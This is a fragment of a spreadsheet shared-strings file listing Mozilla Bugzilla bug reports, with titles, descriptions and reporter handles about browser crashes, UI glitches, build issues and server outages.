  <si>
    <t>TESTING-369196</t>
  </si>
  <si>
    <t>Mochitest</t>
  </si>
  <si>
    <t>change the way we use profiles in runtests.pl for mochikit</t>
  </si>
  <si>
    <t>CORE-360032</t>
  </si>
  <si>
    <t>[cocoa] frequently page doesn't show / repaint I have to switch between tabs</t>
  </si>
  <si>
    <t>[cocoa] occasionally page doesn't show / repaint I have to switch between tabs
josh my apoloigies on not having good steps to reproduce or details yet but I have seen been seeing this.
I thought I logged a bug about it but I could not find it.
starting this bug and when I see it next I'll add more comments.</t>
  </si>
  <si>
    <t>moco</t>
  </si>
  <si>
    <t>SEAMONKEY-365181</t>
  </si>
  <si>
    <t>loadHelpRDF with help window in SuiteRunner</t>
  </si>
  <si>
    <t>When opening a help window in SuiteRunner the following messages appear in the error console:
Error: no element found
Source File: chrome://communicator/locale/help/search-db.rdf
Line: 1
and
[Exception... Component returned failure code: 0x80520012
(NS_ERROR_FILE_NOT_FOUND) [nsIRDFService.GetDataSourceBlocking]  nsresult:
0x80520012 (NS_ERROR_FILE_NOT_FOUND)  location: JS frame ::
chrome://help/content/help.js :: loadHelpRDF :: line 198  data: no]</t>
  </si>
  <si>
    <t>stefanh</t>
  </si>
  <si>
    <t>FIREFOX-374986</t>
  </si>
  <si>
    <t>Inappropriate commands are enabled for special folders (bug 370105 regressions)</t>
  </si>
  <si>
    <t>Inappropriate commands are enabled for special folders (bug 370105 regressions).
Offhand the following actions should be disallowed:
 1. Adding folders to the places-root.
 2. Moving or removing the the bookmarks-root.
 3. Removing the folder marked as the bookmarks-toolbar folder.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-90609</t>
  </si>
  <si>
    <t>ewaterways.com - mousing over javascript dynamic menu fails</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux 2.4.3-20mdk i686 en-US 0.8) Gecko/20010409
BuildID:    200104091 2001062815
On the referenced page the Travel Agents tab has a javascript menu that
appears when you mouse over it. Under IE it works. Under Netscape 4.7x it
works under Opera 5.0 it works (mostly). Under Mozilla both on my Linux box
(2001040912) and my Windows 2k box (2001062815) it doesn't work. Doesn't even
show up.
Reproducible: Always
Steps to Reproduce:
Go to page mouse over Travel Agents tab. 
Actual Results:  Nothing.
Expected Results:  Menu with choice Affiliate as top choice should have
appeared. 
I'm not sure I'd class it as Major but I'd put it a step above Normal since
Javascript is a fairly major feature. I don't know Javascript so I couldn't
tell you exactly what command is broken.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-363015</t>
  </si>
  <si>
    <t>CaminoTrunk Talkback reports sent as MozillaTrunk instead</t>
  </si>
  <si>
    <t>Since the fix for bug 361992 we're shipping Talkback again but reports (like the test one of mine in the url field above) are being submitted as MozillaTrunk instead (which means essentially we *still* have no Talkback on trunk).
mento notes this requires kicking the makefiles in the talkback dir</t>
  </si>
  <si>
    <t>coop</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-387836</t>
  </si>
  <si>
    <t>Add webrunner to Mozilla repository</t>
  </si>
  <si>
    <t>I have been getting a lot of contributions and patches for WebRunner and think it would be better to put it in the Mozilla SVN repo. Developer Relations already has the XUL Explorer project in SVN under the projects folder. I assume we could put webrunner under projects as well.</t>
  </si>
  <si>
    <t>TOOLKIT-450665</t>
  </si>
  <si>
    <t>test_bug-365166.js creates file in /tmp instead of in build directory</t>
  </si>
  <si>
    <t>Created attachment 333832
Removes the temp file creation and accesses TestDB instead
In moving the unittest buildslaves to a new user profile this test caused storage access denied errors in make check because it was trying to access a file called bug-365166.sqlite in /tmp which was owned by the prior user.
This test should use TestDB instead or generate the file in the build directory so that in case there are ever two build processes happening at the same time there is no colliding.</t>
  </si>
  <si>
    <t>lukasblakk+bugs</t>
  </si>
  <si>
    <t>FIREFOX-327361</t>
  </si>
  <si>
    <t>bookmarks&gt;manage bookmarks should open in new window</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060215 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060215 Firefox/1.6a1
mange bookmarks should poep in new window like the tools options too make it look neater or have option too open manage bookmarks in new tab
Reproducible: Always</t>
  </si>
  <si>
    <t>zed260</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-476534</t>
  </si>
  <si>
    <t>Nagios auth prompt could be super helpful for busy people</t>
  </si>
  <si>
    <t>Currently it says (in Fx3.0):
  A username and password are being requested by https://nagios.mozilla.org. The site says Nagios: try guest/guest
Suggest it be changed so that the site says
 Nagios: use your LDAP account (username before the @ only) or guest/guest</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-326378</t>
  </si>
  <si>
    <t>lists.mozilla.org is down</t>
  </si>
  <si>
    <t>Don't know if it's related to the scheduled maintenance on Feb 07 2006 or not but lists.mozilla.org is no longer responding to hails.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-456935</t>
  </si>
  <si>
    <t>Sisyphus - JavaScript Tests - add bisection script</t>
  </si>
  <si>
    <t>Created attachment 340299
bisect.sh patch
finding fixes and regressions on hg is a pita but hg bisect does make things nice. This is a working script I have started using to test new javascript tests and to find fixes and regressions on mozilla-central and tracemonkey. It doesn't yet support CVS but that should be possible as well.</t>
  </si>
  <si>
    <t>NSS-298955</t>
  </si>
  <si>
    <t>rsaperf won't authenticate to hardware tokens</t>
  </si>
  <si>
    <t>When using rsaperf -n   rsaperf uses CERT_FindCertByNickname
which cannot authenticate to the token. The call simply needs to be replace with
PK11_FindCertFromNickname .</t>
  </si>
  <si>
    <t>CORE-284889</t>
  </si>
  <si>
    <t>OOM crash [@nsStyleContext::ApplyStyleFixups]</t>
  </si>
  <si>
    <t>GetUniqueStyleData could return nsnull is several cases (e.g. invalid
nsStyleStructID OOM etc.). This is not handled in
nsStyleContext::ApplyStyleFixups which could result in a crash</t>
  </si>
  <si>
    <t>bastiaan</t>
  </si>
  <si>
    <t>dewildt</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-374095</t>
  </si>
  <si>
    <t>Add SSH key</t>
  </si>
  <si>
    <t>Created attachment 258686
SSH Public Key
Could you please add the attached key to my cvs-www account?  I'd like both this and my current key to work if possible.
Thank you.</t>
  </si>
  <si>
    <t>nb</t>
  </si>
  <si>
    <t>CORE-463305</t>
  </si>
  <si>
    <t>Widget: Win32</t>
  </si>
  <si>
    <t>Bottom area of textboxes not clickable when placed in a panel with aero glass</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b2pre) Gecko/20081105 Minefield/3.1b2pre
Sometimes its not possible to clear the entered text from the search bar by a mouse click. If you hover over the cross icon it is not correctly detected each time. It depends of the direction of movement. In some situations the cursor doesn't change to a pointer but is still shown as the text cursor. Clicking on it doesn't clear the text in the search box.
Steps:
1. Open at least 3 tabs
2. Open the all tab or ctrl-tab panel
3. Enter a search term
4. Move over the cross icon
With the last step we sometimes fail to detect the icon. It does only happen in both panels. Other instances of the search widget behave correctly. So it seems to be an issue for this instance.</t>
  </si>
  <si>
    <t>tellrob</t>
  </si>
  <si>
    <t>hskupin</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-397640</t>
  </si>
  <si>
    <t>Topic edit box should have normal textbox context menu (Cut/Copy/Paste/etc.)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Build Identifier: ChatZilla 0.9.78.1 [Firefox 2.0.0.7/2007091417]
When I'm trying to edit Channel topics i have to paste marked Text by Ctrl-V as there is no Paste in the Context menu. But only in the Topic edit.
Next thing about that topic editing: Any click with the mouse outside that tab closes the topic and all changes are lost...
Maybe add a Save Topic Button ? 
Reproducible: Always
Steps to Reproduce:
1.open Topic edit
2.try to paste via Context menu
3.try to copy some text when topic is open
Ooops i put all into the details. I hope its OK
(But I want a Bug-Number :D )</t>
  </si>
  <si>
    <t>Spikor_ut2k4</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-342640</t>
  </si>
  <si>
    <t>Doing a multiline paste makes analys of logs impossible.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060611 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.4) Gecko/20060611 Firefox/1.5.0.4
If you paste a multiline string inside chatzilla the string will end up being displayed over some lines (\n is beeing converted to a real new line). This also ends up geting into the logfile (if you use it).
As I am a developer of PISG (http://pisg.sf.net) an analys tool for irc logs I think this format is somewhat broken as all other clients I have looked at does create multiplie timestamps (one for each row) whereas chatzilla just creates one for the first line.
Reproducible: Always
Steps to Reproduce:
1. Just paste a multiline string for example this is line 1\nthis is line 2\nthis is line 3
Actual Results:  
something like:
[HH:mm]  this is line 1
this is line 2
this is line 3
Expected Results:  
something like:
[HH:mm]  this is line 1
[HH:mm]  this is line 2
[HH:mm]  this is line 3</t>
  </si>
  <si>
    <t>azoff</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-416079</t>
  </si>
  <si>
    <t>At least one of the static webheads serving up 500 ISEs to people</t>
  </si>
  <si>
    <t>It seems one of the static webheads serving www.mozilla.org is serving 500 ISEs to people.
These bugs have all been filed in the last 24 hours:
Bug 415888
Bug 415927
Bug 416017
Bug 416043
Bug 416046
Bug 416056
Bug 416078
Might be at the AMS cluster since I can't reproduce this and since one of the reporters has a .uk e-mail address.</t>
  </si>
  <si>
    <t>CORE-117172</t>
  </si>
  <si>
    <t>Trunk Crash when attempting to attach something to a mail [@ nsFileView::GetSelectedFile]</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.7+) Gecko/20011222
BuildID:    20011222
When attaching something to an email the file windows opens displaying no
files at all. It just sits there empty until you click on it no matter where
you point your cursor. Then the whole thing just exits and the Netscape -
talkback windows emerges.
Reproducible: Always
Steps to Reproduce:
1.Open Mail &amp; newsgroups
2.Select Compose
3.Click Attach
4.Click somewhere on the attachment windows
5.Bye bye Mozilla...o)
Actual Results:  Mozilla crashed resulting in the Netscape talkback window being
activated.
Expected Results:  Should have displayed the contents of my root folder
allowing me to select which file to attach to my email.</t>
  </si>
  <si>
    <t>loft74</t>
  </si>
  <si>
    <t>CORE-170184</t>
  </si>
  <si>
    <t>Form scroll bars don't display anymore</t>
  </si>
  <si>
    <t>Build ID: 2002092204 (trunk) Win2k.
Steps to reproduce:
1. Load http://bugzilla.mozilla.org/enter_bug.cgi?product=Browser
2. See the Component form selectbox without any scrollbar it's transparent
instead or display content of a previous window which was on top of Mozilla before.
Sev: Critical 'it could be a smoketest blocker).</t>
  </si>
  <si>
    <t>wolruf</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-485380</t>
  </si>
  <si>
    <t>MozillaTry tinderbox not displaying any columns or build data at all</t>
  </si>
  <si>
    <t>MozillaTry is currently not displaying available info on several Talos boxes.  The error does not appear to be on the side of the builders as other Talos machines with the same configuration are successfully adding their information.
Missing columns:
qm-pubuntu-try01
qm-pubunut-try02
qm-pxp-try01
Several other columns were missing but reed resurrected them through running a cleaning script.</t>
  </si>
  <si>
    <t>CORE-468758</t>
  </si>
  <si>
    <t>[FIX]ASSERTION: Why are we being called with a pending exception? with img onload</t>
  </si>
  <si>
    <t>Created attachment 352247
testcase
###!!! ASSERTION: Why are we being called with a pending exception?: '!::JS_IsExceptionPending(mContext)' file /Users/jruderman/central/dom/src/base/nsJSEnvironment.cpp line 1825</t>
  </si>
  <si>
    <t>CORE-507457</t>
  </si>
  <si>
    <t>Firefox crashes when opening certain e-mails in aol webmail. [@nsStyleSet::AddImportantRules(nsRuleNode* nsRuleNode*)]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Whenever I open emails from the apple newsletter and some from family Firefox crashes. Hard. Some have images others do not so it does not seem to matter. It only occurs with certain e-mail addresses though.
Reproducible: Always
Steps to Reproduce:
1. Log into AOL webmail.
2. Click on emails from News@InsideApple.apple.com (the newsletter address) or other bad address.
3. It says Loading at the bottom like normal then Firefox crashes.
Actual Results:  
Firefox closes in it's crash. Then it says Would you like to submit a report? After restarting it is fine until I open another email from apple.
Expected Results:  
Firefox should have opened the email in the webmail thing and I should have been able to read it.
I'm using the default theme. The emails open fine in Safari.</t>
  </si>
  <si>
    <t>katie7070</t>
  </si>
  <si>
    <t>BUGZILLA-530019</t>
  </si>
  <si>
    <t>Bugzilla should ship with a valid CGI.pm version in lib/</t>
  </si>
  <si>
    <t>CGI.pm doesn't use any XS and it doesn't really have any XS dependencies (CPAN will install FCGI when you install CGI but CGI.pm doesn't actually *need* FCGI in order to function particularly not for what Bugzilla uses it for).
A lot of people seem to have trouble getting CGI.pm installed and it's the only core Perl module that we require the upgrading of.
I could easily include it in the built tarballs of Bugzilla that we ship on bugzilla.org simply by modifying the existing buildtarball.sh script and then modifying makediffs.pl to exclude lib/ from the diff.
This won't involve a code patch just a change to the release process so all I really am looking for is approval or any good technical objection.</t>
  </si>
  <si>
    <t>BUGZILLA-338793</t>
  </si>
  <si>
    <t>Remove DBID_to_name() from globals.pl</t>
  </si>
  <si>
    <t>DBID_to_name() can probably be replaced by Bugzilla::User-&gt;new($user_id)-&gt;name. We just have to make sure we don't break the code when we passed an unknown or invalid user ID.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-582433</t>
  </si>
  <si>
    <t>Discovery Pane</t>
  </si>
  <si>
    <t>Implement Discovery pane HTML/CSS</t>
  </si>
  <si>
    <t>Please implement the HTML and CSS for the Discovery Pane. Designs are here:
http://mozilla.seanmartell.com/pane/pane-1b.jpg
http://mozilla.seanmartell.com/pane/pane-2.jpg
http://mozilla.seanmartell.com/pane/pane-1.jpg
The first image shows what the pane will look like at small sizes. The next 2 images show the pane at larger sizes. Please use the size of the mocks above as actual sizes -- the first is the minimum smallest size and the others are the largest size.
Media queries should be used such that when the pane is in one-column size the Top Add-ons and More Ways to Customize boxes should be side-by-side at the bottom of the page and the Mozilla mission box should be hidden. In two column form they should go out to the right.
Almost all of this should be done using only CSS. This page will be viewed by only Firefox 4 and above so any fancy new HTML and CSS is game. 
Don't worry about working links or if the content is actually correct we'll update that later.
There are 2 versions of the 2 column pane above to show 2 different promo modules. The promo module can actually rotate though it's not obvious from the mocks. It will not rotate automatically but can be rotated manually.
Please implement both the featured collection promo and Rock Your Firefox. The rotation widget should be copied from here: http://mozilla.seanmartell.com/csstransitions/ (there's a commented out background image that might be usable otherwise I sent the PSDs to you for slicing)
In any add-on blocks please replace the author and updated date with more lines of the summary.
This is the current page: https://services.addons.mozilla.org/en-US/firefox/discovery/3.7pre/Darwin
And this is the template for it: http://github.com/jbalogh/zamboni/blob/master/apps/discovery/templates/discovery/pane.html
Thanks!</t>
  </si>
  <si>
    <t>craigcook.bugz</t>
  </si>
  <si>
    <t>fligtar+bugs</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-174150</t>
  </si>
  <si>
    <t>File Handling</t>
  </si>
  <si>
    <t>links to pdf files produce link could not be found though Opera can find them</t>
  </si>
  <si>
    <t>Right-clicking and requesting a download of the pdf or ps links at this url in
Mozilla 1.2b build 2002100808 on NT sp6 or in the Mozilla 1.1 release running on
Windows 2000 produces an error message:  link could not be found.  The web page
might have been removed or had its name changed.  Right-clicking and choosing
download for these same links works fine in Opera 6.04.</t>
  </si>
  <si>
    <t>sims</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-423913</t>
  </si>
  <si>
    <t>-fshort-wchar does not work on gcc 4.2.1 in arm scratchbox</t>
  </si>
  <si>
    <t>currently configure.in passes -fshort-wchar to gcc.  this doesn't work when building against the maemo sdk:
[sbox-arm3: ~] &gt; cat t.c
int main()
{
Â  Â  Â  Â  return 0
}
[sbox-arm3: ~] &gt; gcc -fshort-wchar t.c
/scratchbox/compilers/arm-linux-cs2007q3-51sb1/bin/../lib/gcc/arm-none-linux-gnueabi/4.2.1/../../../../arm-none-linux-gnueabi/bin/ld: ERROR: /tmp/ccoJUOWj.o: Conflicting definitions of wchar_t
The work around is to set an env flag:
export SBOX_BLOCK_CROSS_COMPILER_ARGS=-fshort-wchar</t>
  </si>
  <si>
    <t>mh+mozilla</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-488519</t>
  </si>
  <si>
    <t>Support Tag Searching</t>
  </si>
  <si>
    <t>Tags are no fun unless people can search for them and see pages filled with different sized words.  It also makes for a fun game which I will hereby dub Tag Tales the goal of which will be to tell a short story using the sizes of words to determine order.  I suspect it will devolve from a fine abuse of tagging into lol look how big the word balls is lets add it to more stuff.  Nevertheless this bug also builds on the spec ( http://docs.google.com/Doc?docid=dds6vwb4_1dxwx5vg3&amp;hl=en ) and includes:
1.7: Search engine support
1.9: Tags are shown on add-on listing pages
1.10: search result page when searching only for a tag  Including URL support</t>
  </si>
  <si>
    <t>yem.huynh</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-417062</t>
  </si>
  <si>
    <t>graphs-stage refusing connections.</t>
  </si>
  <si>
    <t>All the machines that are reporting to graphs-stage are have their data dropped.  The error message is:
DEBUG: process_Request line: (1040 'Too many connections')
DEBUG: process_Request line: 
DEBUG: process_Request line: 
DEBUG: process_Request line: &lt;!-- The above is a description of an error in a Python program formatted
DEBUG: process_Request line:      for a Web browser because the 'cgitb' module was enabled.  In case you
DEBUG: process_Request line:      are not reading this in a Web browser here is the original traceback:
DEBUG: process_Request line: 
DEBUG: process_Request line: Traceback (most recent call last):
DEBUG: process_Request line:   File /var/www/html/graphs/bulk.cgi line 10 in ?
DEBUG: process_Request line:     from graphsdb import db
DEBUG: process_Request line:   File /var/www/html/graphs/utils/../graphsdb.py line 5 in ?
DEBUG: process_Request line:     db = MySQLdb.connect(localhostgraphgr4phgraphs_stage)
DEBUG: process_Request line:   File /var/www/html/graphs/utils/../databases/mysql.py line 20 in connect
DEBUG: process_Request line:     return GraphConnection(*args**kwargs)
DEBUG: process_Request line:   File /usr/lib/python2.4/site-packages/MySQLdb/connections.py line 164 in __init__
DEBUG: process_Request line:     super(Connection self).__init__(*args **kwargs2)
DEBUG: process_Request line: OperationalError: (1040 'Too many connections')</t>
  </si>
  <si>
    <t>CORE-311672</t>
  </si>
  <si>
    <t>Remove the obsolete 2nd parameter from |nsIStringBundleService::createBundle(...)| JS callers</t>
  </si>
  <si>
    <t>Since bug 76332 was fixed nsIStringBundleService::createBundle(...)
needs only one argument |aURLSpec|.
&gt; 87   nsIStringBundle createBundle(in string aURLSpec)
However many scripts have the second argument in that function.
And contributors do not stop using that wrong style for more than 4 years.
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;file=nsIStringBundle.idl&amp;branch=&amp;root=/cvsroot&amp;subdir=mozilla/intl/strres/public&amp;command=DIFF_FRAMESET&amp;rev1=1.13&amp;rev2=1.14
lazy scripts list:
http://lxr.mozilla.org/mozilla/source/browser/base/content/search.xml
http://lxr.mozilla.org/mozilla/source/browser/components/bookmarks/content/bookmarks.js
http://lxr.mozilla.org/mozilla/source/toolkit/content/widgets/browser.xml
http://lxr.mozilla.org/mozilla/source/toolkit/content/widgets/dialog.xml
http://lxr.mozilla.org/mozilla/source/toolkit/content/widgets/stringbundle.xml
http://lxr.mozilla.org/mozilla/source/toolkit/content/widgets/wizard.xml
http://lxr.mozilla.org/mozilla/source/toolkit/content/contentAreaUtils.js
http://lxr.mozilla.org/mozilla/source/xpfe/communicator/resources/content/contentAreaUtils.js
http://lxr.mozilla.org/mozilla/source/xpfe/components/bookmarks/resources/bookmarks.js
http://lxr.mozilla.org/mozilla/source/xpfe/global/resources/content/bindings/browser.xml
http://lxr.mozilla.org/mozilla/source/xpfe/global/resources/content/bindings/dialog.xml
http://lxr.mozilla.org/mozilla/source/xpfe/global/resources/content/bindings/stringbundle.xml
http://lxr.mozilla.org/mozilla/source/xpfe/global/resources/content/bindings/wizard.xml</t>
  </si>
  <si>
    <t>torisugari</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-112861</t>
  </si>
  <si>
    <t>several toolkit events created during window creation are unnecessary</t>
  </si>
  <si>
    <t>When a window is created the following NS_EVENTS are created:
NS_CREATE
NS_SETZLEVEL
NS_MOVE
Each of these events are dispatched to the view system. On pages with large
numbers of views this causes a page load performance hit and most of these
events seem to be unnecessary.  lxr indicates that only NS_MOVE is being used.
It is used in the webshell to record the position of the top-level window. We
should generate a NS_MOVE only for top-level windows not child windows. The
NS_CREATE and NS_SETZLEVEL do not seem to be used at all and should be suppressed.
In addition some other events for child windows may not be necessary. We should
investigate:
NS_GOTFOCUS
NS_LOSTFOCUS
NS_ACTIVATE
NS_DEACTIVATE
There are also NS_MOUSE_MOVE events generated every time a child window is
created. We may want to suppress mouse moves events that are generated as the
result of a window create.
As a test I put a hack into nsViewManager to ignored all of the
NS_CREATENS_SETZLEVEL NS_MOVE events. Loading the 300 combobox testcase
resulted in substantial improvement in load time:
With unnecessary events
-----------------------
12.26
11.696
11.987
With events removed
-------------------
8.7 sec
8.823
Note: this test was done after I had already put in the patch for bug 112525
which removed the O(n^2) traversal of the view's when processing events.</t>
  </si>
  <si>
    <t>kmcclusk</t>
  </si>
  <si>
    <t>CORE-567451</t>
  </si>
  <si>
    <t>Inline some hot paths</t>
  </si>
  <si>
    <t>These show up in Shark profiles and really shouldn't...</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-406510</t>
  </si>
  <si>
    <t>Tabbed Browsing</t>
  </si>
  <si>
    <t>Restructure tabs to be truly view-based</t>
  </si>
  <si>
    <t>Created attachment 291160
refactoring (trunk version)
While looking into bug 405672 (which this patch will fix) I started doing some cleanup of dead code from the old tab implementation that was confusing me and then some refactoring and many hours later the result was a restructuring of the tab implementation with all the tab functionality consolidated into a view. The current tab implementation tried to be cell-based but a rather convoluted supporting scaffolding had emerged that re-invented most view behavior scattered through several class so it wasn't any lighter-weight than just using a view directly (but was much more confusing). At some point if it needs to walk like a duck and quack like a duck a trained and well-painted cat just isn't the right solution.
Although the patch is large there's almost no *new* code here the code of the new TabButtonView is just collected from other classes in a series of refactorings with a small bit of new glue to manage them as views. I deliberately left as much intact as possible in the code I brought in so that this patch would focus on consolidation rather than re-implementation so there are some //XXX comments carried along and left as they are for future work. Hopefully this will give us a more manageable foundation for our upcoming tab work.
I was testing continuously through my refactoring and I'm not aware of any regressions (but more people banging on it is always good). This is a trunk version I'll make a branch version (which should be very similar) once this is ready to be checked in.
Here's a high-level overview of what the patch does:
BrowserTabItemContainerView--a strange very low-functionality glue view that bridged between the cell drawing and the tab bar--has been renamed TabButtonView and pulled out into its own class. The new TabButtonView has pulled in the following tab button implementation pieces from where they were dispersed:
- Ownership of the subviews/cells (close button label spinner) from BrowserTabViewItem
- Drawing logic from TabButtonCell (and a tiny bit from IconTabViewItem)
- Mouse tracking from RolloverTrackingCell (the parent of TabButtonCell which was kind of trying to be a view and wasn't used anywhere else)
- Click and drag handling from BrowserTabBarView
- Tooltip support from BrowserTabBarView
Code for managing making the tab rects dirty has been simplified in a few places by the fact that the view can be told to redraw directly rather than having to go through BrowserTabView.
The zero-sized-frame hack for spillover tabs has been replaced by simply not having them in the view hierarchy when they aren't visible.
The now-unused setImageVisible: method from TruncatingTextAndImageCell has been removed.
The following classes now contain nothing useful and have been completely removed (the cvs remove isn't in the patch because it adds a lot of text to the patch without serving a useful purpose):
  TabButtonCell
  RolloverTrackingCell
  IconTabViewItem</t>
  </si>
  <si>
    <t>SEAMONKEY-386467</t>
  </si>
  <si>
    <t>Upon update Icon launch preferences are not maintained</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.4) Gecko/20070509 SeaMonkey/1.1.2
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.4) Gecko/20070509 SeaMonkey/1.1.2
Following an update to any version of SeaMonkey on of the first calls that I get from customers is only email appears or only the browser appears. The customer launch icons are set to -mail -browser: example (linux as I don't have a handy Windows system available right now):
/usr/local/seamonkey/seamonkey -mail -browser
However upon update and/or reload the properties are reset to default:
/usr/local/seamonkey/seamonkey
Is is possible that SM can leave the existing icon launch properties alone on update/reinstall?
Reproducible: Always
Steps to Reproduce:
1. Update SM
2.
3.</t>
  </si>
  <si>
    <t>glgxg</t>
  </si>
  <si>
    <t>CORE-438997</t>
  </si>
  <si>
    <t>DoApplyRenderingChangeToTree should not invalidate SVG frames</t>
  </si>
  <si>
    <t>Created attachment 324909
fix
DoApplyRenderingChangeToTree calls aFrame-&gt;Invalidate(aFrame-&gt;GetOverflowRect()) for all kinds of frames including SVG frames. This is incorrect for SVG frames since their mRects are not meaningful in this context (they're used to store device-pixel bounds). We should just ignore SVG frames since they do their own invalidation on style context changes.
I don't have a test I just noticed this was causing unnecessary and unwanted invalidation.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-480048</t>
  </si>
  <si>
    <t>qm-mini-vista01 02 03 and 05 are unhappy</t>
  </si>
  <si>
    <t>They seem to be failing to start the browser for Ts every other run or so. I could start the same browser manually many times in a row without issue so I'm not sure what's going on.
I recall hearing theories about heat problems or positions in the rack not sure if that was in relation to these machines or not - I couldn't find any bugs.
This could also just be dying hardware I suppose.</t>
  </si>
  <si>
    <t>CORE-369778</t>
  </si>
  <si>
    <t>Javascript regular expression captures broken with alternation in some cases.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Javascript regular expressions capturing multiple matches using alternation set some of the result's capture fields to undefined in some cases. The cause is based on the order of the alternates in the text.
Reproducible: Always
Steps to Reproduce:
Example code:
re = /(?:(ABC)|(123)){2}/
var t = re.exec(ABC123)
var u = re.exec(123ABC)
Actual Results:  
t = ['ABC123'undefined'123']
u = ['123ABC''ABC''123']
Expected Results:  
Captures should be identical in both cases with a possible change in order in the results array.</t>
  </si>
  <si>
    <t>ae.anderson0</t>
  </si>
  <si>
    <t>sthussey</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-436502</t>
  </si>
  <si>
    <t>Data Collection/Metrics</t>
  </si>
  <si>
    <t>instantApply=tue in extensions/metrics/content/prefs.xul</t>
  </si>
  <si>
    <t>I just noticed this while MXR:ing instantApply. Exists on 1.9.0 too of course. Obviously it should be true. That said I have no idea if you want the pref to be instantApply or if it works fine as it is.</t>
  </si>
  <si>
    <t>WEBSITES-512562</t>
  </si>
  <si>
    <t>creative.mozilla.org</t>
  </si>
  <si>
    <t>Keep me logged in function</t>
  </si>
  <si>
    <t>I would really like a keep me logged in function so I don't have to log in every time I restart/close Firefox. Default cookie expiry should be 2 weeks which is pretty common for many websites.</t>
  </si>
  <si>
    <t>THUNDERBIRD-465385</t>
  </si>
  <si>
    <t>IMAP folders not deleted messages marked for deletion when compacting</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2pre) Gecko/20081117 Lightning/1.0pre Shredder/3.0b1pre ID:20081117032343
I have an IMAP account setup to Mark as Deleted when I delete a message.  I am no longer able to compact the folder and have the marked messages removed.
Reproducible: Always
Steps to Reproduce:
1. In an IMAP folder mark a message as deleted
2. Right-click the folder and select Compact.
Actual Results:  
Messages marked for deletion are not removed.
Expected Results:  
Messages marked for deletion should have been removed from the server and from the folder display.</t>
  </si>
  <si>
    <t>Chris</t>
  </si>
  <si>
    <t>MOZILLA.ORG-429838</t>
  </si>
  <si>
    <t>Change SSH public key for romaxa@gmail.com account</t>
  </si>
  <si>
    <t>Created attachment 316600
New public key
By some reasons (memory issues) I need to change my SSH key for CVS/hg account.</t>
  </si>
  <si>
    <t>romaxa</t>
  </si>
  <si>
    <t>CORE-163549</t>
  </si>
  <si>
    <t>Fix/disable goURI ?</t>
  </si>
  <si>
    <t>goURI() can be abused to check if the user has visited a URL during this
session. This is slightly more serious than 147777.
I see 3 potential fixes:
1) Limit goURI() to divulge information only for same origin/normal security
policies
2) disable goURI() so that it always fails
3) make goURI() throw exception
I think we should evaluate how commonly goURI() is used on the web and what is
the usage pattern to determine the best fix if anything can even be done.</t>
  </si>
  <si>
    <t>security-bugs</t>
  </si>
  <si>
    <t>BUGZILLA-360967</t>
  </si>
  <si>
    <t>Developers page needs to link to a query pulling good intro bug bugs</t>
  </si>
  <si>
    <t>We were discussing in a Firefox community-involvement brainstorming session about how Bugzilla has the good intro bug on the status whiteboard for bugs that new developers can get started with easily and that might be a good thing for Firefox to do...  then I went looking for it to find out specifically what it was and discovered that it's not discoverable.  We really need to have a link to that buglist on the developers page (or perhaps in the contributors guide but in the How to help section of the developers page would probably be a good spot.</t>
  </si>
  <si>
    <t>BUGZILLA-189635</t>
  </si>
  <si>
    <t>editcomponents.cgi should use user-matching</t>
  </si>
